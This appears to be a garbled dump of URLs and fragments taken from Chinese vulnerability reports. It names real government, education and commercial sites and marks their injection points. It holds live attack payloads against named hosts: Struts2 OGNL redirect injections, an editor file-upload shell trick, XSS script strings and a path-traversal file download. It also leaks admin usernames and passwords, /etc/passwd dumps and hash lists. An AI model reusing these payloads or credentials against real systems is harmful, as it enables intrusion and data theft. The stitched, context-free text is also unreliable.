http://www.yuexiu.gov.cn/recruit1/resumePreview.jsp?resumeId=1101&catid=9963 http://www.yxst.gov.cn/recruit/resumePreview.jsp?resumeId=174&catid=9989 http://222.240.215.227:23380/ http://www.jletv.cn/program_show_list.aspx?nid=11811 http://www.jletv.cn/admin 
http://www.jletv.cn/CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp http://www.jletv.cn/uploadertemp/uploading.e7d8104a-0ba6-4b47-8285-59d442e2b7d3.1.asp;.resx?a=response.write%28%22hehe%22%29 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702【注入点】 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1 http://www.2144.cn/girls/detail/offset/1【注入点】/cate_id/1【注入点】 http://my.tv.sohu.com/user/setting/mobile.do http://my.tv.sohu.com/user/a/mobile/bindMobile.do?m=18311110000&code=6567 http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=12&t=0.7178548609372228 http://vip.sto.cn/RegisterAction.action http://vip.sto.cn/RegisterAction.action?redirect:Http://www.baidu.com http://vip.sto.cn/RegisterAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D https://udb.duowan.com http://www.jumei.com/track_cps.php?referer=yiqifa_cps&src=yiqifa_cps&sub_src=Njc3MzgyfDAwOTQ2MjFkNGQxMTQ1ODFmMjJi&ret=http://www.jumei.com/ inurl:Flight/InternationalTicket.asp http://www.tokair.com/ http://idc.dzwww.com/ShowNews.asp?id=5 http://e.visitbeijing.com.cn/category.php?act=scenic_ticket&tid=0&aid=512&pr=0&sort=time&order=desc http://fes.adidas.com.cn/ http://fun.kid.qq.com/ebookController/update_assets_list?&=a&campaignID=1&etclass=0&formatID=6&t=Fri%20Jun%2027%2012:27:18%20GMT+0800%202014&tags=&templateID=561 http://www.qule.com/news/index.html?type=10&News_page=2 
http://www.qule.com/cscenter/commonquestion.html?type=3&gameid=1028&Userquestion_page=2 http://www.qule.com/adindex.php?ida=SX_130_48_33&idu=1 http://www.bcbay.com/life/education/newsViewer.php?id=243820出现多种显然易见的SQL注射漏洞,危害不小 http://mpa.zjgsu.edu.cn/web.rar http://bbs.hdbird.com/ http://www.jje.cn/九江教育xx网, http://www1.binyang.gov.cn/govinfo/infolist.aspx?TiCaiHao=T12&LeiMuDaiMa=T1201 http://xxx.com/?plugin=yls_reg www.huyue.com.cn http://218.25.115.6/travelcharter/edit.do Username:lgk Password:hy1234567 Username:bwp02 Password:hytravel612 http://www.techbridge-inc.com/action.php http://www.techbridge-inc.com/ www.techbridge-inc.com http://my.kekenet.com/index.php/user/resetpsw/xxxxxxxxxxxxxxxxx.html http://www.magicwinmail.com/success.php plus.aili.com/product.php?keyword=&nums=10&channel=pro_shehua&jsonpcallback=jsonp1404612914837 plus.aili.com/product.php?keyword=&nums=10'&channel=pro_shehua&jsonpcallback=jsonp1404612914837 plus.aili.com/product.php?keyword=&nums=10 plus.aili.com/product.php?keyword=&nums=10 http://swgk.impcas.ac.cn/fckeditor/editor/filemanager/connectors/test.html http://m.ly.com/deal/membersign.html?mid=19869225a323e36b88f8d89a7cb6114f&stype=0&pwd=a94057c50ef3c68fd22d9c53a311af91&ts=1404614412&sign=20f739012243fd8082c28246880d0adf http://m.ly.com http://%24%7Balimama.alimamaroot%7D/orange/alipay_bind_callback_mm.htm http://www.rohde-schwarz.com.cn/ http://cii.songguo.com/Login.aspx http://www.fao.org/nems/rss/nems_detail.asp?event_id=39480 http://drops.wooyun.org/papers/548 http://cofcomag.cofco.com/cn/periodical/old.aspx http://zlh.cofco.com/SiteFiles/Inner/action.aspx?publishmentSystemID=71&styleID=9&type=login http://www.ruaho.com http://www.uninx.com/lgy_nzdj/index2.php?ID=2153&member_id=19405 http://nx.bbn.com.cn/lgy_nzdj/index2.php?ID=2153&member_id=19405 http://search.veryeast.cn/job_search/job_list http://house.focus.cn/chinacrrc/res_yjbg.php http://ele.me/ http://m2.qiushibaike.com/article/77760799 
http://nearby.qiushibaike.com/user/6395516/detail http://www.hbsjtt.gov.cn/ http://222.222.62.73:8080/XFMana/wsxf.do http://www12.zzu.edu.cn/ie/details.php?newsType=2&newsId=624 http://hb4006.cn/ http://hb4006.cn/service.php?News_ParentID=6&News_ID=6 http://www.jdair.net http://drops.wooyun.org/webview.html后出现searchBoxJavaBridge_接口漏洞。如上图。 http://10.218.42.26:7001/MWWebSite/console/Default.jsp?rootMenuID=b62830d9-26d8-4614-a5e9-f202bdb91a2a http://wooyun.org/bugs/wooyun-2010-065284 http://wooyun.org/bugs/wooyun-2010-065340可被以下函数绕过: table-layout:fixed;word-break:break-all margin-left:0;margin-right:0 http://wo.online.cn/ http://wo.online.cn/reg/findpwd.aspx teacherlms.gzedu.com/login.do http://teacherlms.gzedu.com/login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zkzs.nau.edu.cn/1/sm.asp?id=1 http://zkzs.nau.edu.cn/1/admin/u_u.asp?id=1893 http://www.lhbm.gov.cn/ShowDetail.asp?id=430&SType=6 http://hz.focus.cn/housemarket/video/video_show.php?id=43 http://nj.focus.cn/housemarket/video/video_show.php?id=27 http://house.focus.cn/endhouse/wf_show.php?house_id=37 http://uadm.dooland.com/loading/news.php?group_id=20&id=805 inurl:Qnews.php?ID= http://home.focus.cn/newscenter/newscenter.php?subject_id=33&show_citynum=549755813888 http://home.focus.cn/jiancaicheng/index.php?city_id=39 http://home.focus.cn/elite/article_index.php?group_id=2513&class_id=857 http://home.focus.cn/group/class_photos_more.php?type=pic&class_id=18 http://home.focus.cn/msglist/1703/?chkusr_id=11179/ http://home.focus.cn/group/photo.php?group_id=1702 
http://home.focus.cn/group/photoshow.php?photo_id=4160673&group_id=1702 http://home.focus.cn/life/news_week.php?days=7&category_id=2 http://home.focus.cn/life/newscenter.php?subject_id=9 inurl:cms/voteManager/ inurl:seeresult_bz.jsp http://www.yilicai.com.cn/editor/ http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click【注入点】 http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click http://ims.agent.soufun.com/soufuntalk/OnlineTalk/Client.ashx?callback=jsonp1404532114077&RequestType=GetAgentInfo&City=%25E9%2598%25B2%25E5%259F%258E%25E6%25B8%25AF&AgentIds=163437693 sql:http://www.qckd.net/news.asp?id=82 http://www.qckd.net/down/ http://www.qckd.net/downfile.asp http://www.qckd.net/info/index.htm http://www.dooland.com/magazine/dl2.php?pid=106665 http://***.***.com//users/1.app http://202.102.41.221 http://www.hisense.com) www.gzidc.com user:yabiao@21cn.com password:123456 http://www.ns365.net/siteadminlogin.php?domain=zhiboguangzhou.com user:domainmaster website:zhiboguangzhou.com password:dx2uCfyW http://124.172.221.86:81/)~然后登录以后就是可以查看达能所有的订单的照片~上面有什么你懂的~危害你懂的~订单数量太大,不好计数,就不说具体多少了~看下面吧 http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2820528&jsonpcallback=jQuery1910415277008194493_1404614931360&_=1404614931367 http://wooyun.org/bugs/wooyun-2010-053726 http://home.focus.cn/elite/newscenter.php?class_id=22 http://www.qckd.net/news.asp?id=82 http://appservice.lenovomm.com/lenovo-bless/login/submit http://changchun.ccpit.org/show.php?classid=1&id=889 DDD31A47F94F366F138A0E06C2D4449EB8879EC4:localhost A849F277BCEF900CEF905B8DE721CF915E8EC466:localhost DF044FCDFF0A48E1C2B0CC7CC2ADEE5649B4FF00:localhost C1CE94E50B84F18B7BE6F3ED9835EB0F7201D188:localhost ADA0D486C9EF130A5D7A40FC70776E10FCEB4157:localhost B88C904D810FC8E8A517A92AA580785C47BF206F:localhost DB6200F0946CE4FED0CA4907BF424434B744233F:localhost A81EF3E67F24FBC749046D53BB3F5DCC3DBD5923:localhost 
D78A92851F180B74B523D6EBE129C69FA8867179:localhost FDC3BD86E1E573CDDA6373775DB76A5355E7E5E0:localhost E19A24C051E6F7EDD37C227AD4D53B197AF0C032:localhost AD5EF9E6B67568AFD9ECB609CD2B6FE4C55D8AC4:localhost EF3AE579A7159F3510DDF84921400A9F379ACC82:localhost C0F03157E9D73033FC5A8E6A34F26649ED23E105:localhost DABD2B9DB8CB951D668C7ED01CB5B11631E02F15:localhost B889FD322B44CFABD99D7276CCC621AED97365AA:localhost E196D0A25AC09F2B7FE2641DFB750C71A79363C6:localhost EC4F36FC0FD77764431E2012E0AA5E72CA0B514A:localhost FA7B10DA3B8808FBE9D647A8DD66AB40B3BF5F54:localhost D3F093F51EB8D30F4D7AD8A57B94BAD98E7257B0:localhost A1564D00AEA081E46DE2C673304599CE65300CD0:localhost EAB66400B35B592B4C87064D3F6F2262D5539558:localhost B1DA0A2079FB2B2D292AB1A0B3E59FA15770F1DE:localhost BC4C8E05AC8F8EA01E0D15D9E8178B04B5BB1672:localhost AC988923403A7FB7AF05D8DCF5468F06DFD0FF1F:localhost EB59E9132FFC6DD9A83297484E3B80025CC95450:localhost A724078AE7107F2225D97E54B35FACE9B675D4CC:localhost A78B4DBE6CD1BB809CDB74E517059314AFDAA02E:localhost EC8137604C75C65B819F7FC0283F1013550B9C9B:localhost EC8137604C75C65B819F7FC0283F1013550B9C9B:localhost C68983BC1BA0FF4D6943B2705BD119F0610A3940:localhost F356804976F0AE4615D1856A71CD6837D02E85FD:localhost D49B4CC37597E53A3BF58C456DCD130455B55EED:localhost DF937FD66E90A312F1474546453EC319C123DF62:localhost BBD517CC5AA8784DABC94C450700C6AC14F79DFA:localhost BB12DEE2BD7202F127359F4803B44BDABA05EC69:localhost FFA2B2C7247E4023DEE72EFE43B3D033516CAB23:localhost E1E052D3D255E41527C0741B19A03887AD8ACC7E:localhost C9A0A677E5E1DE643E7C2DF97186E9042F8AC4A6:localhost E17B6E71140F0F6737F1CC6E851D2915A2E81ED3:localhost A70A4F897A1F9EC6834C5CBFE6921346B3DBA7DE:localhost C65123D1711DDA8A042DAB711879F6EC2D6BBEB9:localhost C1466A2F9DBB9D115C0AC6EF9FAD8E20DE0DA892:localhost CCBAFE646FEEF40ABB90D5587BF2C9B0220295BA:localhost B44942B668476E5771F0E6EC92DBDB04ECC90241:localhost B0104539D7065B033D341D8B81E40321DE4319FD:localhost D08DC7271E3669C5EB01628508A2465B34E23BE9:localhost 
F302DCDD13898E520BAA078D7F32BD5EC5E015EB:localhost B3B53B12694BAEEC2AA2C9FC6698A7715131B793:localhost D3FD71A6BED9A8FBF39892A734E8412131748869:localhost D31CBF464F9B4260C0CB21E23A277601EEC75133:localhost EDC489DDA5ED6A315B5C83356E56031560BEAD89:localhost F0482AC2C67409703FAF4C4F0AA69B0D16426B9D:localhost B9C81D2557102737E894A3D6177DF0B5DB4A47F9:localhost A99E88BF5081FEFF4A6F88147A57AD874A897F60:localhost B2DE25F723F751FD23686AB16B05E0C1E9CCA2FD:localhost DA70A09A9936BD0C29920DC8D3152FA1B730D4FE:localhost C0B495C545F63B8704231F5B9458CD906825F4BE:localhost E77234D5F33348F01EC64C3DE1E50B6E7BB39904:localhost E9035AE55DCC04BD5E325946FA7F5938C3F5E37C:localhost D8E75AC35F11C11A5EECB21ACC3BC60A80D6E716:localhost EF859BC72208C47F93B965F98DA6805E6BD7A3AF:localhost D2981A9F2CBF6E9ED57B6037DFF0A629DA514867:localhost BF143BE746EDDF4144D94DC3B11DC42D98A15278:localhost AE1E22A8678482EE3A156E406F0343C1FBFD2316:localhost F58E152737D2030FFC5AC7EF5E858B3771D95C44:localhost FFE8702A4A3E22FAAEFC80A1AF6D77F1CD38A313:localhost ADC9FECFF2F950B5F7543FA2475450E2D4FB4642:localhost A3D7B72BD5B7639DD448859C10FAF59CD0EAE3D8:localhost D0CB7C97A925824188EB23455A7F4B0EB0E705C9:localhost F71997CFB959E71D841A11F15AFCBDBA1CB0D54C:localhost E9035AE55DCC04BD5E325946FA7F5938C3F5E37C:localhost root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind 
Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mysql:x:27:27::/dev/null:/sbin/nologin www:x:1000:1000::/dev/null:/sbin/nologin shaowei:x:1001:1001::/home/shaowei:/bin/bash wdcpu:x:999:999::/www/wdlinux/wdcp:/sbin/nologin http://www.gamepaopao.com/mayi.website/game!login.action http://service.zj.10086.cn/yw/showinfo/show.do?bid=BFA93573C3D650FEE044B499BA622A0A http://res.ec.cn:8080/admin/login.php,用户名:zhejiang,密码:10086,对客户业务开通情况及客户经理情况进行查询。(登陆页面后,点击左列菜单“订购业务情况查询”进入后,在输入查询手机号后,点击查询。查询结果列表中包括客户开通服务、所属企业以及本企业的移动客服经理信息等情况)。 http://124.172.221.85:8081/query2014.asp http://work.bestv.com.cn/bestvhomesite/fckeditor/editor/filemanager/connectors/test.html可上传 http://work.bestv.com.cn/bestvhomesite/fckeditor/editor/filemanager/connectors/uploadtest.html可上传 http://work.bestv.com.cn//BestvHomeSite/upload/userfiles/media/ArticleUpdas.aspx上传的木马 inurl:sydwzk/demand inurl:sydwzk/download/Down.jsp www.zzsyzp.com(漳州市事业单位招聘考试网)示例: http://www.zzsyzp.com/syrcservlet?RequestType=SHOWINFO&memberID=11496&RightCode=Guest&InfoFlag=state http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif http://61.235.249.195:808 http://61.235.249.195:6789 http://61.235.249.195:6789/ManageFrame/left.aspx http://61.235.249.195:6789/ManageFrame/top.aspx http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx 
http://61.235.249.195:808/Common/UserManage/UserEdit.aspx http://61.235.249.195:808/Common/UserManage/UserList.aspx http://61.235.249.195:6789/Common/UserManage/UserList.aspx http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx http://61.235.249.195:6789/Common/UserManage/UserList.aspx http://www.sanwant.com.cn/ http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 http://cj.wyn88.com/ file:///mnt/sdcard/test.html;component=com.mx.browser/com.mx.browser.navigation.MxFullscreenWebviewActivity;end http://121.28.81.126/AIMSWeb/detail.jsp?option=showDetail&view=nyjj&id=201 http://www.flyji.com/user/index!logout.action http://www.flyji.com/user/index!logout.action url:http://fl.act.qq.com/119860/addev/h5/236719 http://www.hbwmc.cn/wmc/ http://xxgk.hfut.edu.cn/third.php?p_id=6&a_id=713 http://www.yiyouquan.com/ http://startbbs.com/topic/2332帖子下载的源码,肯定是最新的v1.1.5.2版本。 http://sq.jr.jd.com/topic/getHotTopicList?key=1000&callback=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://yto.21tb.com http://www.ky-express.com/Chanpin/Default.aspx?article=GPSdingwei http://222.247.53.199/ http://www.sunp.gov.cn/gpcsoft/Gpcsoft_login.do http://114.80.120.39:8080/ http://114.80.120.39:8080/logs/userIp/ http://114.80.120.39:8080/logs/userIp/20140304.txt http://114.80.120.39:8080/logs/userIp/userinfo.txt http://czsb.nbfet.gov.cn/progress.php http://地址/rom-0 http://119.93.175.74/rom-0 http://uc.mojichina.com/findpwd/byphone kf.buaa.edu.cn/doLogin.do http://join.iflytek.com/xfzp/utils/dynamic_search.aspx?word=%E5%BC%80%E5%8F%91&channelID=1&RecruitmentType=&Location=&Department=&PublishedTime=2014-02-07 inurl:inurl:cgi-bin/QTS.cgi?count= http://www.xjjw.gov.cn/News.asp?Bigid=30 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.shuikou.gov.cn/news.php?id=950 http://www.bzsly.gov.cn/brow.asp?classid=4 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 
http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://ftpf.ft.gov.cn/News.asp?classid=78 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.gzgb.gov.cn/Article/?Type=18 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.tzhymz.gov.cn/getlist.asp?pmid=101&fmid=102 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.yclynk.gov.cn/newsview.asp?id=158 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.tljw.gov.cn/article.php?MsgId=91231 http://nsrxx.hazz-l-tax.gov.cn/nsrxx/list/spbf.do?b_spbf=true&spid=27 http://www.phbi.gov.cn/readnews.asp?id=4213 http://www.xnyf.gov.cn/news_more.asp?lm=73 http://www.nmgmr.gov.cn/search.jsp?title_content=all&keyword= http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://fzb.ahsz.gov.cn/openxw.asp?id=41041 http://www.bjszfj.gov.cn/newlist.php?id=5 http://md.dali.gov.cn/article_show_mdgk.asp?articleid=24215 http://www.gxwater.gov.cn/Publish/Reservoir/ReservoirDailyOperation.aspx?ENNMCD=&bgTime=&edTime= http://211.137.180.20:19010/jmx-console/ 
http://211.137.180.20:19010/admin-console/login.seam?conversationId=269 http://211.137.180.20:19010/iswin/ http://cloud.bbn.com.cn/business/business_detail.jsp?id=401 http://cloud.bbn.com.cn/business/business_detail.jsp?id=309 http://ti.qq.com/remind/view_pc.html?_wv=1027&rid=18980287&rtype=group&src=tips&ADUIN=(QQ号码)&ADSESSION=1404886086&ADTAG=CLIENT.QQ.5335_.0&ADPUBNO=26366 http://www.jsspzx.gov.cn/JsWeb/bsxz/ShowDetailInfo.jsp?xmId=1301 http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& http://weixin.51web.com/LoginAction!index.action?debug=command&expression="U_U"& http://u.xunzai.com/app/1.txt http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://hyfw.12306.cn/hyinfo/action/ClcscxAction_index?cllx=%22aaa%22%20onload=%22alert%281%29%22%20/ http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,注入点&access_token=TOKEN&_=1404913266225 xxx.com/XT/Accounts/User_Management/ModifyUser.aspx?UserID=admin http://agri.suning.com.cn/NewsDetail.php?id=293&t=0 http://www.koolearn.com/downloadservlet?type=1&download=2013-10/yasijjchtl.doc http://222.45.224.106:8888/moblie/login.action jdbc:oracle:thin:@122.70.129.72:1521:smartdb root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD 
Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin Tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh oracle:x:500:500::/home/oracle:/bin/bash http://office.focus.cn/group/recordvote.php http://www.cmseasy.org http://www.cmseasy.org/faq.php?action=grouppermission http://www.renren.com/161125632/profile http://status.renren.com/status/v7/,后面添加上uid http://status.renren.com/status/v7/161125632 http://www.snds.gov.cn:99/i/oem/grpslogin.jsp www.snds.gov.cn:99 http://www.snds.gov.cn:99 http://as.baidu.com/a/item?docid=6662298&pre=web_am_rel&pos=item_3004_0&f=hao%40item_3004_0_76679 http://office.focus.cn/vote/brand_intro.php?brand_id=213 http://wsxf.hbzw.gov.cn:8001/ http://wsxf.hbzw.gov.cn:8001/outLogin.qd ID:lihongzhong http://efax.sdtele.com/login.jsp http://www.syzsks.cn/Admin/Account/ http://www.gd315.gov.cn/z.asp http://www.dixintong.com/activityshow.aspx?aId=660 
www.sh.com http://hr.gzmtr.com/doLogin.do http://183.62.35.210:8081/gzdtss/SS2012/PortalLogin.aspx http://2013.gzmtr.com/job/person/login.jsp http://www.xinyangedu.gov.cn/web.rar http://ueditor.baidu.com/website/download.html#ueditor(软件下载地址) http://ueditor.baidu.com/build/build_down.php?n=ueditor-list.zip http://ueditor.baidu.com/build/build_down.php?n=(这里填写文件路径和文件名) http://www.dooland.com/magazine/special/mo http://w.zuzuche.com/order.php?order_id=HD123456789 http://w.zuzuche.com/order.php?order_id=HD709141256 http://www.qishi.gov.cn/lm_dwgk/list.asp?gType=100 http://www.qishi.gov.cn/lm_dwgk/details.asp?gArtId=1109 http://www.qishi.gov.cn/lm_dwgk/admins/admin.asp http://www.0370qd.com/index.html http://211.137.10.117 http://yao.xywy.com/index.php?a=search&keyword= http://dealer.yaofang.cn/dealer/show_log http://www.dooland.com/magazine/special/dedecms/mag_update.php?id=49 http://www.dooland.com/magazine/special/dedecms/fabu_mag_list.php http://119.7.222.212:9090/monitor http://119.7.222.212:9090/monitor/%5b2014-7-09%5d/ http://121.9.213.10/wap/b.php?id=1099 http://sqlmap.org http://www.dooland.com/magazine/special/sp http://www.baidu.com/s?wd=inurl%3AShowInfo.aspx%3FPNodeNum&pn=130&oq=inurl%3AShowInfo.aspx%3FPNodeNum&ie=utf-8 xxx.com/JX/SZGL_jx11/YWGL/ByTeacher/SZGLEdit.aspx?ZGH=0001 http://dm.2144.cn/comic/9275【注入点】/717【注入点】.html site:http://dm.2144.cn/ inurl:type http://52shuke.com http://mgr.yaofang.cn/ http://dealer.yaofang.cn/ http://zb.upc.edu.cn/classify.asp?cate=1 http://xmgl.gzsmzt.gov.cn/ http://gkpj.scnu.edu.cn/ http://117.78.1.167/ xxx.com/XT/Accounts/Role_Management/Add_Role.aspx?RoleID=js101 xx.com/BG/TXL/TxlDetail.aspx?ID=1 xxx.com/BG/ToDo/ToDoDetail.aspx?ID=1 http://www.datacarrier.cn/ http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.wowsai.com/index.php?app=shopping&act=custom&id=5 http://authoritysys.bjcc.gov.cn 
http://hwa.happigo.com/backup.tar.gz http://jipiao.uzai.com/ http://graschool.bjmu.edu.cn/EmploymentWeb/zxgg.aspx?id=2537 http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip http://www.phpmps.com/demo/admin/login.php http://www.hztdjt.com/tdoa/ http://www.hztdjt.com/tdoa/Default.aspx http://x.x.x.x/hrss/rm/ResetPwd.jsp http://59.173.0.46:8090 http://www.chinaqhd.cn http://fp.gy12366.cn/ http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://lighting.tcl.com/cn/news-d.aspx?ID=410&SortID=80 callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://erp.winta.net/xtrpm/default.aspx鑫塔集团房地产项目管理集成系统 http://www.rainbowcn.com/lks/sys/lks_public.nsf/ http://112.64.171.134:8001/ http://112.64.171.134:8001/Service1.asmx http://112.64.171.134:8001/Manager中可以查看到后台目录的完整架构 http://112.64.171.134:8001中下载了数据库链接信息的文件和内网共享地址的文件 http://drops.wooyun.org/papers/1404 xxx.com/XS/XSSX/PracticeRule/PracticeRuleEdit.aspx?RuleID=2 http://112.81.51.120:8080/tcbi/secure/login.action http://www.fengcms.com http://www.yytingting.com/profile/anchor.jsp?userId=62724553 http://121.29.220.23:8080/wf/login.action xx.com/XS/XSSX/PracticeWorkPlan/PracticeWorkPlanEdit.aspx?PlanID=1 http://58.214.233.113:8800/lmsv5/ http://60.216.4.162:9091/lmsv5/ http://www.xysyxx.com.cn/oa/default.asp http://oa.hbzyy.org/default.asp http://oa.hbzyy.org//db/lmtof.mdb http://211.137.13.217/main/zcfg.asp?adclass=9 http://www.xcdafz.gov.cn/ http://www.xcdafz.gov.cn/admin/Login.asp http://newsadmin.yiban.cn/ http://admin.yiban.cn/ http://www.chinagrains.org.cn/new/industry/newsview.asp?id=1存在SQL注射漏洞,hash密码可以爆破 http://115.182.51.140/html/encoder/index.html http://113.108.109.39:8089/ http://guf521656.h163.92hezu.org/index.php?controller=down&file=L3VwbG9hZC9cLi5cY29uZmlnLnBocA== 